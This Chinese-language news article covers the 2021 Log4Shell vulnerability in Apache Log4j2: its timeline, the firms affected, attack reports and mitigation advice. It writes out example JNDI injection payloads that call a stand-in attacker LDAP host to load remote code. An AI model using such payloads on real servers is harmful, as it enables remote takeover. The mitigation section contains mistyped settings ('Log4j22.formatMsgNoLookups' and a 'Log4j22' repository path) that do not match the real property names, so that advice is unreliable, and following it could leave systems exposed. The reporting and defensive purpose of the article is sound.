2021年11月24日，阿里云安全團隊依然像往常一樣進行著漏洞的篩查工作。

讓人沒想到的是，團隊成員之一的Chen Zhaojun一鏟子下去，就挖出了一個「過去十年來影響最大、最嚴重的漏洞」——Log4Shell。

借著這個漏洞，攻擊者只需要提交一個字符串就能訪問對方的服務器，甚至還能在里面上傳運行任何代碼！

結果就是，12月10號，本來已經在準備過周末的大廠程序員們，都起來通宵加班處理漏洞了。

這個漏洞波及了多少大廠呢？

由于Log4j2這個庫實在是太受歡迎了，所以包括蘋果、Tesla、亞馬遜、Cloudflare、ElasticSearch、Red Hat、Twitter、Steam、百度、網易、騰訊等大廠都會受到影響。

可能，還有數百家甚至數千家其他組織也會受到影響。

一些信息安全研究人員預計，未來幾天互聯網上對服務器的攻擊會大幅增加。

驚魂一刻

11月24日，開源項目Apache Log4j2的一個遠程代碼執行漏洞被提交。

12月7日上午，Apache發布了2.15.0-rc1版本更新。

12月9日晚，漏洞的利用細節被公開，影響范圍幾乎橫跨整個版本（從2.0到2.14.1-rc1）。

當大家紛紛升級到2.15.0-rc1之后發現，該補丁依然可以被繞過。

12月10日凌晨2點半左右，Apache Log4j2緊急更新了2.15.0-rc2版本。

此時，各個大廠也幾乎都在熬夜搶修。

據火絨不完全統計，僅在Github上，就有60644個開源項目發布的321094軟件包存在風險，這一漏洞可以說是影響了互聯網上70%以上企業系統的正常運轉。

Java開發框架中，受到Log4j2的影響Top10（來源：火絨安全）

這一漏洞名為CVE-2021-44228，也叫Log4Shell或LogJam，是一個遠程代碼執行（RCE）類漏洞，存在于一個「數百萬」應用程序都在使用的開源Java日志庫Log4j2中。

由于Java應用程序通常會記錄各種各樣的事件，例如用戶發送和接收的消息，或者系統錯誤的詳細信息，因此該漏洞可以通過多種方式觸發。

而這一漏洞最危險的地方是它太容易被攻擊者利用了，即使是毫無經驗的普通人也可以利用這個漏洞成功執行攻擊。

攻擊者只需發送一則特殊的消息到服務器（包含類似${jndi:ldap://server.com/a}的字符串），就可以執行任意的代碼，并有可能完全控制該系統。

據阿里的@程序員子悠介紹，服務器會通過Log4j2記錄攻擊者發送的請求匯中包含的基于JNDI和LDAP的惡意負載${
jndi:ldap://http://attacker.com/}，其中，http://attacker.com是攻擊者控制的地址。

當服務器通過JNDI向http://server.com請求，觸發惡意負載之后，http://attacker.com就可以在響應中添加任何可執行腳本，注入到服務器進程中。

于是，上個周末，大大小小公司的安全團隊都在爭先恐后地修補Log4Shell漏洞，晚一秒，就有可能讓黑客危及互聯網上數百萬臺設備。

而黑客們也沒閑著，安全服務商imperva當天就監控到了140多萬次針對CVE-2021-44228的攻擊。

新西蘭計算機應急響應小組(CERT)、德國電信(Deutsche Telekom)和Greynoise的網絡監控服務都發出了警告：「攻擊者已經在積極利用這個漏洞」。

根據Greynoise的說法，大約100個不同的主機正在大規模地尋找利用Log4j2漏洞的方法。

很快，多家信息安全新聞機構都報道了這個在Apache Log4j2庫中發現的，CVSS嚴重程度為10級的關鍵漏洞CVE-2021-44228。

阿里云安全團隊在12月10日發布公告。

https://help.aliyun.com/noticelist/articleid/1060971232.html

國家互聯網應急中心12月10日發布公告。

https://www.cert.org.cn/publish/main/9/2021/20211210110550958546708/20211210110550958546708_.html

美國國家計算機通用漏洞數據庫12月10日發布公告。

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

Apache基金會也迅速回應，建議所有開發人員能升級就升級，將手頭上使用到的Log4j2庫更新到2.15.0版本，如果因為一些原因升不了級，就使用Apache Log4j2安全漏洞頁面中描述的方法進行撲救。

12月12號，有網友反映銀行的程序都不能用了，推測可能正在加班加點排查，看來波及范圍確實挺大的。

這下程序員們要哭了，紛紛吐槽：

「連夜搶修」

「忙活大半天」

復現漏洞

國民級搜索引擎百度首先遭到了廣大網友的暴力測試！

漏洞剛曝光時，如果在百度搜索框中輸入命令，然后在dnslog中就可以發現訪問信息，隨后開發人員也是緊急修復了這個漏洞。

接著，網友又攻破了一向以安全性著稱的蘋果。

Minecraft也同樣慘遭毒手。

由于Minecraft在軟件中也采用了Log4j2，而且使用范圍很廣，這就導致了除Mohist 1.18外，Minecraft全版本所有系列的服務端全部處于高風險狀態。

這樣一來，在聊天欄輸入命令就可以在游戲中作弊。

對于Minecraft服主來說，當前最該做的就是立即關閉服務器，并進行升級和緊急修復，普通玩家則需要等待，直到服務器確認修復完成。

解決方案

根據360的建議，用戶可以進行如下操作。

常規方案

使用了Apache Log4j2的用戶，請將程序更新至官方最新安全版本（2.15.0-rc2）。下載地址:

https://github.com/apache/logging-Log4j22/releases/tag/Log4j2-2.15.0-rc2

臨時應急方案

修改Log4j2配置：

Log4j22.formatMsgNoLookups=True

設置JVM啟動參數：

-DLog4j22.formatMsgNoLookups=true

設置環境變量：

FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS值為true

可以提高安全性的周邊設置

以下設置或操作可能會對防護此次安全事件起到作用，但無法確保安全。建議結合實際應用場景進行配置：

1. 使用盡可能更高版本的JDK
2. 使用rasp阻斷lookup的調用
3. 使用waf對流量中的${jndi進行攔截
4. 禁止所有不必要的外連數據

開源項目的風險

Log4j2的安全事故一出，不禁讓廣大用戶重新開始懷疑：開源軟件是否真的安全？

一方面大家覺得開源軟件嘛，代碼都拿到手了，在遵照開源協議的情況下，基本就是白嫖。

另一方面，覺得有這么多人都在盯著這份代碼，肯定不會出bug，不然一定會有人提issue修復的。在不花錢的情況下，又指望它有企業級的維護支持與安全性保障。

殊不知，大部分開源軟件都是作者利用業余時間開發的，為開源社區貢獻代碼的驅動力全部來自于star和「用愛發電」。

也正是因為免費，一些開源軟件的受眾規模特別大，從小公司到千億市值的企業都在使用，如果一旦出了漏洞，那后果將不堪設想。

所以，開源有風險，使用需謹慎！